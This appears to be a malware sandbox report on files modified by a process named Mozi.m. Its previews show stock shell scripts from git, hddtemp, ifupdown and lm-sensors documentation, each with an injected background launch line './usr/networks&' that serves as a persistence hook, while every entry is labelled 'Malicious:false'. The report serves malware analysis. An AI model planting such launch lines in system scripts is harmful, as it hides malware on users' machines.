                                                                                                        SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                        /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):243
                                                                                                        Entropy (8bit):5.091025781115778
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                        MD5:BE780CC322587122E892D123BFF726B6
                                                                                                        SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                        SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                        SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):792
                                                                                                        Entropy (8bit):4.925184193549972
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                        MD5:895868AC151D9953AD152F77240CF73D
                                                                                                        SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                        SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                        SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):486
                                                                                                        Entropy (8bit):5.198694046664742
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                        MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                        SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                        SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                        SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2904
                                                                                                        Entropy (8bit):5.006955417229927
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                        MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                        SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                        SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                        SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                        /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):637
                                                                                                        Entropy (8bit):4.973192610623575
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                        MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                        SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                        SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                        SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14967
                                                                                                        Entropy (8bit):5.111069408805373
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                        MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                        SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                        SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                        SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                        /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):822
                                                                                                        Entropy (8bit):5.456000973546581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                        MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                        SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                        SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                        SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):617
                                                                                                        Entropy (8bit):4.789300168717738
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                        MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                        SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                        SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                        SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1015
                                                                                                        Entropy (8bit):4.896629241453442
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                        MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                        SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                        SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                        SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                        /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):461
                                                                                                        Entropy (8bit):5.204671186006819
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                        MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                        SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                        SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                        SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):92
                                                                                                        Entropy (8bit):4.373538165973413
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                        MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                        SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                        SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                        SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):519
                                                                                                        Entropy (8bit):5.218301073324955
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                        MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                        SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                        SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                        SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):633
                                                                                                        Entropy (8bit):4.881818972878624
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                        MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                        SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                        SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                        SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):266
                                                                                                        Entropy (8bit):4.736279036741599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                        MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                        SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                        SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                        SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2712
                                                                                                        Entropy (8bit):5.4524991837552035
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                        MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                        SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                        SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                        SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2564
                                                                                                        Entropy (8bit):5.346461718403454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                        MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                        SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
